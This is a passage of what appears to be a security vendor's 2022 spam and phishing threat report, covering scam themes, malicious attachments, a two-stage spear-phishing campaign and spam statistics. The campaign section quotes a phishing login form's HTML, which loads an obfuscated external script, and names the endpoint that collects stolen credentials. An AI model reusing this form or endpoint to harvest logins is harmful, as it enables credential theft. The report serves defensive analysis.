gone.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132716/spam-phishing-report-2022-04-1024x474.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132716/spam-phishing-report-2022-04.png>)\n\nFake donation sites started popping up after the Ukraine crisis broke out in 2022, pretending to accept money as aid to Ukraine. These sites referenced public figures and humanitarian groups, offering to accept cash in cryptocurrency, something that should have raised a red flag in itself.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132903/spam-phishing-report-2022-05-1024x607.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132903/spam-phishing-report-2022-05.png>)\n\n### The pandemic\n\nThe COVID-19 theme had lost relevance by late 2022 as the pandemic restrictions had been lifted in most countries. At the beginning of that year, we still observed phishing attacks that used the themes of infection and prevention as the bait. For example, one website offered users to obtain a COVID vaccination certificate by entering their British National Health Service (NHS) account credentials. Others offered the coveted Green Pass without vaccination.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141812/spam-phishing-report-2022-06-1024x653.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141812/spam-phishing-report-2022-06.png>)\n\nScammers abused legitimate survey services by creating polls in the name of various organization to profit from victims' personal, including sensitive, data. In another COVID-themed scheme, the con artists introduced themselves as the Direct Relief charity, which helps to improve the quality of life and healthcare in poorer regions. Visitors were offered to fill out a form to be eligible for $750 per week in aid for twenty-six weeks. The survey page said the "charity" found the victim's telephone number in a database of individuals affected by COVID-19. Those who wished to receive the "aid" were asked to state their full name, contact details, date of birth, social security and driver's license numbers, gender, and current employer, attaching a scanned copy of their driver's license. To lend an air of authenticity and to motivate the victim to enter valid information, the swindlers warned that the victim could be prosecuted for providing false information. The scheme likely aimed at identity theft: the illegal use of others' personal details for deriving profit. The cybercrooks might also use the data to contact their victims later, staging a more convincing swindle.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141841/spam-phishing-report-2022-07-1024x741.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141841/spam-phishing-report-2022-07.png>)\n\n### Crypto phishing and crypto scams\n\nThe unabated popularity of cryptocurrency saw crypto scammers' interest in wallet owners' accounts growing, despite the fact that rates continued to drop throughout the year. Cybercriminals chased seed phrases, used for recovering access to virtual funds. By getting the user's secret phrase, cybercriminals could get access to their cryptocurrency balance.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141926/spam-phishing-report-2022-08-1024x748.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141926/spam-phishing-report-2022-08.png>)\n\nIn a typical internet hoax manner, crypto scam sites offered visitors to get rich quick by paying a small fee. Unlike common easy-money scams, these websites asked for payments in cryptocurrency \u2014 which they promised to give away and which they were trying to steal. The "giveaways" were timed to coincide with events that were directly or indirectly associated with cryptocurrency. Thus, one of the fake sites promised prizes on the occasion of Nvidia thirty-year anniversary (the company is a major vendor of graphics processing units, which are sometimes used for crypto mining). Promotion of cryptocurrency use was another pretext for the "giveaways". Users were offered to deposit up to 100 cryptocurrency units for a promise to refund two times that amount, purportedly to speed up digital currency adoption. In reality, the scheme worked the way any other internet hoax would: the self-professed altruists went off the radar once they received the deposit.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142443/spam-phishing-report-2022-09-1024x457.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142443/spam-phishing-report-2022-09.png>)\n\n### Compensation, bonus, and paid survey scams\n\nBonuses and compensations are hard to deny in times of crisis and instability, but it is worth keeping in mind that "financial assistance" is frequently promised by con artists to swindle you out of your money.\n\n"Promotional campaigns by major banks" were a popular bait in 2022. Visitors to a fraudulent web page were offered to receive a one-time payment or to take a service quality survey for a fee. Unlike the prizes offered in the aforementioned crypto schemes, these fees were smaller: an equivalent of $30\u201340. The cybercriminals used an array of techniques to lull victims' vigilance: company logos, assurances that the campaigns were legit, as well as detailed, lifelike descriptions of the offer. Similar "campaigns" were staged in the name of other types of organizations, for example, the Polish finance ministry.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142523/spam-phishing-report-2022-10-1024x511.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142523/spam-phishing-report-2022-10.png>)\n\nAid as distributed by various governmental and nongovernmental organizations remained a popular fraud theme in 2022. For example, in Muslim countries, scammers promised to send charity packages, purportedly under a "Ramadan Relief" program that aimed at helping low-income families during the Ramadan fast. The fasting period typically sees higher prices for food and household products, whereas observers buy more than they normally do and may be faced with a shortage of money. Legitimate charities, such as [WF-AID](<https://wfaid.org/rrf/>), do operate Ramadan relief programs, and judging by the screenshot below, the fraudsters were pretending to represent that organization. An eye-catching picture of the organization's logo and huge boxes was accompanied by a list of foodstuffs included in the aid package, with positive "recipient feedback" posted below the message. The victim was asked to make sure that their name was on the list of recipients, so they could get a package. This required providing personal data on the website and sending a link to the scam site to instant messaging contacts\u2014nothing extraordinary for hoaxes like this. This way, the scammers both populate their databases and have victims spread links to their malicious resources for them. In addition to that, they might ask the victim to cover the "shipping costs".\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142600/spam-phishing-report-2022-11-992x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142600/spam-phishing-report-2022-11.png>)\n\nGrowing utility rates and an increase in the price of natural resources have prompted several governments to start discussing compensations for the population. Payout notices could arrive by mail, email, or as a text message. Cybercriminals attempted to take advantage of the situation by creating web pages that mimicked government websites, promising cash for covering utility payments or compensation of utility expenses. Visitors were occasionally asked to provide personal details under the pretext of checking that they were eligible, or simply to fill out a questionnaire. In Britain, con artists posing as a government authority promised to compensate electricity costs. The description of the one-time payout was copied from the official website of the authority, which did provide the type of compensation. After completing the questionnaire, the victim was asked to specify the electric utility whose services they were using and enter the details of the bank card linked to their account with the utility. The promise of \u00a3400 was supposed to make the victim drop their guard and share their personal information.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142636/spam-phishing-report-2022-12-1024x434.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142636/spam-phishing-report-2022-12.png>)\n\nIn Singapore, scammers offered a refund of water supply costs, purportedly because of double billing. An energy or resource crisis was not used as a pretext in this particular case, but refunds were still offered in the name of the water supply authority.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142706/spam-phishing-report-2022-13-1024x810.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142706/spam-phishing-report-2022-13.png>)\n\n### Fake online stores and large vendor phishing\n\nWe see fake websites that imitate large online stores and marketplaces year after year, and 2022 was no exception. Phishing attacks targeted both the customers of globally known retailers and regional players. An attack often started with the victim receiving a link to a certain product supposedly offered at an attractive price, by email, in an instant messaging app, or on a social network. Those who fell for the trick could lose access to their accounts, have their bank card details stolen, or waste the money they wanted to spend on the dirt-cheap item.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142737/spam-phishing-report-2022-14-1024x515.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142737/spam-phishing-report-2022-14.png>)\n\n"Insides" about "private sales" were also used as a lure. Thus, a web page that copied the appearance of a Russian marketplace promised discounts of up to 90% on all items listed on it. The page design did look credible, with the only potential red flags being really low prices and the URL in the address bar not matching the official one.\n\nMany large vendors, notably in the home appliances segment, announced in early spring that they would be pulling out of Russia, which caused a spike in demand. This was reflected in the threat landscape, with fake online stores offering home appliances popping up all over the Russian segment of the internet (also called Runet). Large retailers being out of stock, combined with unbelievably low prices, made these offers especially appealing. The risk associated with making a purchase was to lose a substantial amount of money and never to receive what was ordered.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142817/spam-phishing-report-2022-15-1024x665.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142817/spam-phishing-report-2022-15.jpg>)\n\n### Hijacking of social media accounts\n\nUsers of social media have increasingly focused on privacy lately. That said, curiosity is hard to contain: people want to check out who has been following them, but do so without the other party knowing. Cybercriminals who were after their account credentials offered victims to have their cake and eat it by using some new social media capability. A fake Facebook Messenger page promised to install an update that could change the user's appearance and voice during video calls, and track who has been viewing their profile, among other features. To get the "update", the victim was asked to enter their account credentials, which the scammers immediately took over.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142852/spam-phishing-report-2022-16.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142852/spam-phishing-report-2022-16.png>)\n\nMany Instagram users dream about the Blue Badge, which stands for verified account and is typically reserved for large companies or media personalities. Cybercriminals decided to take advantage of that exclusivity, creating phishing pages that assured visitors their verified status had been approved and all they needed to do was to enter their account logins and passwords.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142919/spam-phishing-report-2022-17-1024x263.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142919/spam-phishing-report-2022-17.png>)\n\nRussia blocked access to both Facebook and Instagram in March 2022, which led to the popularity of Russian social networks and Telegram skyrocketing. This increased usage meant the users' risk of losing personal data was now higher, too. "Well-wishers" who operated scam sites offered to check if Russian social media contained any embarrassing materials on the victim. The scam operators told the users it was possible to find damaging information about every third user of a social network by running a search. If the user agreed to a search to be done for them, they were told that a certain amount of dirty linen indeed had been found. In reality, there was no search \u2014 the scammers simply stole the credentials they requested for the check.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142944/spam-phishing-report-2022-18-1024x295.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142944/spam-phishing-report-2022-18.png>)\n\nOne of the added risks of social media phishing is scammers getting access to both the social media account itself and any linked services.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143155/spam-phishing-report-2022-19.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143155/spam-phishing-report-2022-19.png>)\n\nThe Telegram Premium status provides a range of benefits, from an ad-free experience to an ability to block incoming voice messages, but the subscription costs money. Scammers offered to "test" a Premium subscription free of charge or simply promised to give one for free if the victim entered their Telegram user name and password or a verification code sent by the service, which was exactly what the cybercrooks were after.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143228/spam-phishing-report-2022-20-EN.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143228/spam-phishing-report-2022-20-EN.png>)\n\nOne more phishing campaign targeting Telegram users was arranged to coincide with the New Year's celebration. Scammers created a page on the telegra.ph blogging platform that posted a gallery of children's drawings, encouraging users to vote for their favorites. Scammers sent a link to that page from hacked accounts, asking users to vote for their friends' kids' works. Those who took the bait were directed to a fake page with a login form on it. The cybercriminals were betting on the users to go straight to voting, without checking the authenticity of the drawings, which had been copied from various past years' competition pages, as requests to vote for one's friends' kids are common before public holidays.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143725/spam-phishing-report-2022-21.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143725/spam-phishing-report-2022-21.jpg>)\n\nThe Telegram auction platform named Fragment went live in the October of 2022: it was selling unique usernames. You can become a user by linking your Telegram account or TON wallet. Scammers who were after those account details sent out links to fake Fragment pages. A visitor who tried to buy a username from the fake website was requested to log in. If the victim entered their credentials, the scam operators immediately grabbed those.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143807/spam-phishing-report-2022-22-1024x726.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143807/spam-phishing-report-2022-22.png>)\n\n## Spam in 2022\n\n### The pandemic\n\nUnlike phishing, COVID-themed spam is still a thing. Most of that is "Nigerian-type" scams: millionaires dying from COVID bequeathing their money to treatment and prevention efforts, and to improve the lives of those who have recovered, or Mark Zuckerberg running a special COVID lottery where one can win a million euros even if they are not a Facebook user. Recipients are told that they could claim some IMF money left unallocated because of the pandemic. Others are offered hefty amounts under an anti-recession assistance program.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143915/spam-phishing-report-2022-23-1024x452.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143915/spam-phishing-report-2022-23.png>)\n\nThe amount of spam exploiting the coronavirus theme in some way dropped noticeably during 2022: at the beginning of the year, we were blocking a million of these emails per month, but the figure had shrunk by three times by yearend.\n\n### Contact form spam\n\nThe year 2022 saw cybercriminals abuse contact forms for spam more frequently. In a typical scheme of this kind, scammers find websites that offer registration, contact, or support request forms that do not require the user to be logged in to submit, and do not check the data entered. In some cases, they insert a scam message with a hyperlink in the login or name fields, and in others, add a longer text with images to the message field. Then the attackers add victims' email addresses to the contact fields and submit. When getting a message via a registration or contact form, most websites reply to the user's email address that their request was received and is being processed, their account has been created, and so on. As a result, the person gets an automated reply from an official address of a legitimate organization, containing unsolicited advertisements or a scam link.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13144349/spam-phishing-report-2022-24-1024x433.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13144349/spam-phishing-report-2022-24.png>)\n\nMost scam messages offer a compensation or prize to the recipient. For example, a spam email targeting Russian users promised an equivalent of $190\u20134200 in VAT refunds. To get the money, the victim was offered to open the link in the message. This scheme is a classic: a linked web page requests that the user pay a commission of under a dozen dollars, which is insignificant in comparison to the promised refund. We observed many varieties of contact form money scam: from fuel cards to offers to make money on some online platform.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13145016/spam-phishing-report-2022-25-1024x890.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13145016/spam-phishing-report-2022-25.png>)\n\nScammers took advantage of forms on legitimate sites all around the world. Where spam email in Russian typically played on "prizes" or "earning money", messages in other languages, in addition to offering "prizes", encouraged users to visit "dating sites" \u2014 in fact, populated by bots \u2014 where the victims would no doubt be asked to pay for a premium account.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150322/spam-phishing-report-2022-26-1024x727.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150322/spam-phishing-report-2022-26.png>)\n\nWe blocked upward of a million scam emails sent via legitimate forms in 2022.\n\n### Blackmail in the name of law enforcement agencies\n\nExtortion spam is nothing new. In such emails, attackers usually claim that the recipient has broken the law and demand money. In 2022, these mailings not only continued, but also evolved. For example, there was virtually no text in the messages: the user was either asked to open an attached PDF file to find out more, or they received threats in the form of an image with text. In addition, the geography of mailings widened in 2022.\n\nThe essence of the message, as in similar emails sent earlier, was that a criminal case was going to be opened against the recipient due to allegedly visiting sites containing child pornography.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150404/spam-phishing-report-2022-27-1024x560.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150404/spam-phishing-report-2022-27.png>)\n\nTo avoid serious consequences, the attackers urged the victim to respond as soon as possible to the sender and "settle the matter". Most likely, the scammers would ask for a certain amount of money to be paid in further correspondence for the victim's name to be removed from the "criminal case". In 2022, we blocked over 100,000 blackmail emails in various countries and languages, including French, Spanish, English, German, Russian and Serbian.\n\n### Exploiting the news\n\nSpammers constantly use major world events in their fraudulent schemes. The 2022 geopolitical crisis was no exception. Throughout the year, we saw mailings aimed at English-speaking users proposing transferring money, usually to a Bitcoin wallet, to help the victims of the conflict in Ukraine. Scammers often demand the transfer of money to Bitcoin wallets, as it is more difficult to trace the recipient through cryptocurrency transactions than through the bank ones. Blackmail demanding payment in cryptocurrency used to prevail in spam. Now, attackers have started collecting Bitcoin for charity.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150431/spam-phishing-report-2022-28.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150431/spam-phishing-report-2022-28.png>)\n\nThe news agenda was also used in other scam mailings. For example, in early July, our solutions blocked 300,000 emails where fraudsters were requesting help on behalf of a Russian millionaire, who allegedly wanted to invest money and avoid sanctions. Another mailing said that the European Commission had decided to give away a fund created by Russian oligarchs, and the email recipient might be lucky to get a piece of this pie.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150458/spam-phishing-report-2022-29-1024x328.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150458/spam-phishing-report-2022-29.jpg>)\n\nMore and more "business offers" are appearing among spam mailings, and they exploit the current information agenda. Due to economic sanctions in 2022, enterprising businessmen offered replacements for goods and services from suppliers who left the Russian market. For example, spammers actively advertised services of a company transporting people to Russia. The email text emphasized the fact that many transport companies refused to provide such services.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153541/spam-phishing-report-2022-30-1024x477.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153541/spam-phishing-report-2022-30.png>)\n\nThere were also spam mailings where various companies offered to replace popular international software with Russian equivalents or solutions developed in third countries. In addition, there were spam propositions for intermediary services to open a company or bank account in neighboring countries, such as Armenia, as well as offers of assistance in accepting payments from foreign partners.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153600/spam-phishing-report-2022-31-1024x586.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153600/spam-phishing-report-2022-31.png>)\n\nThe shortage of printer paper in Russia in March and April 2022 spawned a wave of related ads offering paper at discount prices.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153622/spam-phishing-report-2022-32-1024x366.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153622/spam-phishing-report-2022-32.png>)\n\nSpammers in 2022 also actively marketed their promotional mailing services as alternative advertising to unavailable promotion via platforms such as Instagram. For example, in April we blocked around a million of such mailings.\n\nAgainst the backdrop of sanctions and the accompanying disruption of supply chains, there has been an increase in spam offering goods and services from Chinese suppliers. In 2022, our filter blocked more than 3.5 million emails containing such offers, and the number of them was growing, from around 700,000 in the first quarter to more than a million in the fourth.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153708/spam-phishing-report-2022-33-1024x571.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153708/spam-phishing-report-2022-33.png>)\n\n### Spam with malicious attachments\n\nEmployees shifting to remote work during the pandemic and the associated growth of online communications spurred the active development of various areas of phishing, both mass and targeted. Attackers have become more active in imitating business correspondence, not only targeting HR-specialists and accountants, as before the pandemic, but also employees in other departments. In 2022, we saw an evolution of malicious emails masquerading as business correspondence. Attackers actively used social engineering techniques in their emails, adding signatures with logos and information from specific organizations, creating a context appropriate to the company's profile, and applying business language. They also actively exploited off the current news agenda and mentioned real employees from the company supposedly sending the emails. Spammers faked their messages as internal company correspondence, business correspondence between different organizations, and even as notifications from government agencies.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153731/spam-phishing-report-2022-34-1024x508.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153731/spam-phishing-report-2022-34.png>)\n\nMasking malicious emails as business correspondence has become a major trend in malicious spam in 2022. Attackers tried to convince the recipient that it was a legitimate email, such as a commercial offer, a request for the supply of equipment, or an invoice for the payment of goods. For example, throughout the year, we encountered the following scheme. Attackers gained access to real business correspondence (most likely by stealing correspondence from previously infected computers) and sent malicious files or links to all of its participants in response to the previous email. This trick makes it harder to keep track of malicious emails, and the victim is more likely to fall for it.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153756/spam-phishing-report-2022-35-1024x626.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153756/spam-phishing-report-2022-35.png>)\n\nIn most cases, either the [Qbot](<https://securelist.com/qakbot-technical-analysis/103931/>) Trojan or [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/>) was loaded when the malicious document was opened. Both can be used to steal user data, collect information about the corporate network, and spread additional malware, such as ransomware. Qbot also allows you to gain access to emails and steal them for further attacks.\n\nMailings imitating notifications from various ministries and other government organizations have become more frequent in the Runet. Emails were often designed to take into account the specific activities of the organizations they were pretending to be. The sender's addresses copied the logic of email addresses in the relevant agencies, and the malicious attachment was disguised as some kind of specialized document, such as "key points of the meeting". For example, malicious code was found in one of these mailings that exploited a vulnerability in the Equation Editor module, the formula editor in Microsoft Office.\n\nThe perpetrators did not ignore the news agenda. In particular, the malware was distributed under the guise of call-up "as part of partial mobilization" or as a "new solution" to safeguard against possible threats on the internet "caused by hostile organizations".\n\nIn the second case, the program installed on victim's computer was in fact a crypto-ransomware Trojan.\n\n## Two-stage spear phishing using a known phish kit\n\nIn 2022, we saw an increase in spear (or targeted) phishing attacks targeting businesses around the world. In addition to typical campaigns consisting of one stage, there were attacks in several stages. In the first email, scammers in the name of a potential client asked the victim to specify information about its products and services. After the victim responds to this email, the attackers start a phishing attack.\n\nKey facts:\n\n * Attackers use fake Dropbox pages created using a well-known phishing kit\n * The campaign targets the sales departments of manufacturers and suppliers of goods and services\n * Attackers use SMTP IP addresses and _From_ domains provided by Microsoft Corporation and Google LLC (Gmail)\n\n### Statistics\n\nThe campaign began in April 2022, with malicious activity peaking in May, and ended by June.\n\n_Number of emails related to a two-step targeted campaign detected by Kaspersky solutions ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161029/01-en-spam-report-2022-diagrams.png>))_\n\n### How a phishing campaign unfolds\n\nAttackers send an email in the name of a real trade organization requesting more information about the victim company's products. The email text looks plausible and has no suspicious elements, such as phishing links or attachments. A sender's email address from a free domain, like gmail.com, may raise doubts. The email on the screenshot below is sent from an address in this domain, and the company name in the _From_ field is different to its name in the signature.\n\n[![Example of the first email](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153835/spam-phishing-report-2022-36-1024x498.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153835/spam-phishing-report-2022-36.jpg>)\n\n**_Example of the first email_**\n\nIt is worth noting that the use of free domains is not typical for spear phishing in the name of organizations, because such domains are rarely used in business. Most often in targeted attacks, attackers either use [spoofing of the legitimate domain](<https://securelist.com/email-spoofing-types/102703/>) of the organization they are pretending to be, or register domains similar to the original one. In addition, Google and Microsoft are pretty quick in blocking email addresses spotted sending spam. This is the most likely reason why attackers used different addresses in the _From_ header (where the email came from) and _Reply-to_ header (where the reply will go when clicking "Reply" in your email client). This means the victim responds to another address, which may be located in another free domain, such as outlook.com. The address in the _Reply-to_ header is not used for spam, and correspondence with it is initiated by the victim, so it is less likely to be blocked quickly.\n\nAfter victims respond to a first email, attackers send a new message, asking them to go to a file-sharing site and view a PDF file with a completed order, which can be found via the link.\n\n[![An email with a phishing link](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153858/spam-phishing-report-2022-37-1024x642.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153858/spam-phishing-report-2022-37.jpg>)\n\n**_An email with a phishing link_**\n\nBy clicking the link, the user is taken to a fake site generated by a well-known phishing kit. It is a fairly simple tool that generates phishing pages to steal credentials from specific resources. Our solutions blocked fake WeTransfer and Dropbox pages created with this kit.\n\n[![A fake WeTransfer page created using the same phish kit as the target campaign sites](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153925/spam-phishing-report-2022-38-1024x625.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153925/spam-phishing-report-2022-38.jpg>)\n\n**_A fake WeTransfer page created using the same phish kit as the target campaign sites_**\n\nIn the phishing campaign described above, the phishing site mimics a Dropbox page with static file images and a download button. After clicking any element of the interface, the user is taken to a fake Dropbox login page that requests valid corporate credentials.\n\n[![A fake Dropbox page](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153950/spam-phishing-report-2022-39-1024x650.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153950/spam-phishing-report-2022-39.png>)\n\n**_A fake Dropbox page_**\n\n[![Login page with a phishing form](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154022/spam-phishing-report-2022-40.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154022/spam-phishing-report-2022-40.jpg>)\n\n**_Login page with a phishing form_**\n\nWhen victims attempt to log in, their usernames and passwords are sent to https://pbkvklqksxtdrfqkbkhszgkfjntdrf[.]herokuapp[.]com/send-mail.\n \n \n <form name=\"loginform\">\n <div class=\"form-group\">\n <label for=\"\">Email Address</label>\n <input type=\"email\" id=\"email\" class=\"form-control\" name=\"email\" placeholder=\"email Address\">\n <div class=\"email-error\"></div>\n </div>\n <div class=\"form-group\">\n <label for=\"\">Password</label>\n <input type=\"password\" id=\"password\" class=\"form-control\" name=\"password\" placeholder=\"Password\">\n <div class=\"password-error\"></div>\n </div>\n <div class=\"form-group btn-area\">\n <button class=\"download-btn\" id=\"db\" type=\"submit\">Download</button>\n </div>\n </form>\n </div>\n <script src=\"https://firebasestorage.googleapis.com/v0/b/linktopage-c7fd6.appspot.com/o/obfuscated.js?alt=media&token=1bb73d28-53c8-4a1e-9b82-1e7d62f3826b\"></script>\n\n**_HTML representation of a phishing form_**\n\n### Victims\n\nWe have identified targets for this campaign around the world, including the following countries: Russia, Bosnia and Herzegovina, Singapore, USA, Germany, Egypt, Thailand, Turkey, Serbia, Netherlands, Jordan, Iran, Kazakhstan, Portugal, and Malaysia.\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn 2022, an average of 48.63% of emails worldwide were spam, representing a 3.07 p.p. increase on 2021. Over the course of the year, however, the share of spam in global email traffic has gradually declined, from 51.02% in the first quarter to 46.16% in the fourth.\n\n_Share of spam in global email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161102/02-en-spam-report-2022-diagrams.png>))_\n\nThe most active month in terms of spam was February 2022, with junk traffic accounting for 52.78% of all email correspondence. June was in second place (51.66%). December was the calmest, only 45.20% of emails in this month were spam.\n\nOn Runet, the proportion of spam in email traffic is generally higher than worldwide. In 2022, an average of 52.44% of emails were junk mailings. At the same time, the trend for a gradual shift in ratio in favor of legitimate correspondence can also be seen. We saw the largest share of spam in Runet in the first quarter, with 54.72% of all emails, and by the fourth quarter it had dropped to 49.20%.\n\n_Proportion of spam in Runet email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161132/03-en-spam-report-2022-diagrams.png>))_\n\nEven though the second quarter (53.96%) was quieter in terms of spam than the first, the most active month in the Russian segment of the internet was June (60.16%). Most likely, the share of spam in June, both in Russia and globally, was influenced by the surge in mailings with offers from Chinese factories that we observed in that month. And the quietest month in Runet was December (47.18%), the same as globally.\n\n### Countries and territories \u2014 sources of spam\n\nIn 2022, the share of spam from Russia continued to grow, from 24.77% to 29.82%. Germany (5.19%) swapped places with mainland China (14.00%), whose share increased by 5.27 percentage points. Third place is still held by the United States (10.71%).\n\n_TOP 20 countries and territories \u2014 sources of spam, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161204/04-en-spam-report-2022-diagrams.png>))_\n\nThe Netherlands remained in fifth place (3.70%), its share decreased compared to 2021. Sixth and seventh places went to Japan (3.25%) and Brazil (3.18%), whose shares rose by 0.89 and 3.77 p.p., respectively. Next come the UK (2.44%), France (2.27%) and India (1.82%).\n\n### Malicious mail attachments\n\nIn 2022, our Mail Anti-Virus detected 166,187,118 malicious email attachments. That's an increase of 18 million from the previous year. This component caused most triggers in March, May, and June 2022.\n\n_Number of Mail Anti-Virus hits, January \u2014 December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161240/05-en-spam-report-2022-diagrams.png>))_\n\nThe most common malicious email attachments in 2022, as in 2021, were [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) Trojan stealers (7.14%), whose share decreased slightly. [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (4.89%) moved up to second place, and [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (4.61%) spreading as archived electronic documents moved down to third place. The fourth most common malware were vulnerability exploits [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (4.33%) in Microsoft Equation Editor. In 2022, attackers used them significantly more often than [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) exploits in the same component (1.80%). This vulnerability was more widespread in 2021 and has now dropped to tenth place.\n\n_TOP 10 malware families spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161308/06-en-spam-report-2022-diagrams.png>))_\n\n[ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) Trojans (3.27%), sent in the form of disk images, moved up to number five, and the sixth most common was the [Guloader](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Guloader/>) downloader family (2.65%), which delivers remotely controlled malware to victims' devices. They are closely followed by the [Badur](<https://threats.kaspersky.com/en/threat/Trojan.PDF.Badur/>) family (2.60%), PDF files containing links to web resources with questionable content, and in eighth place is the 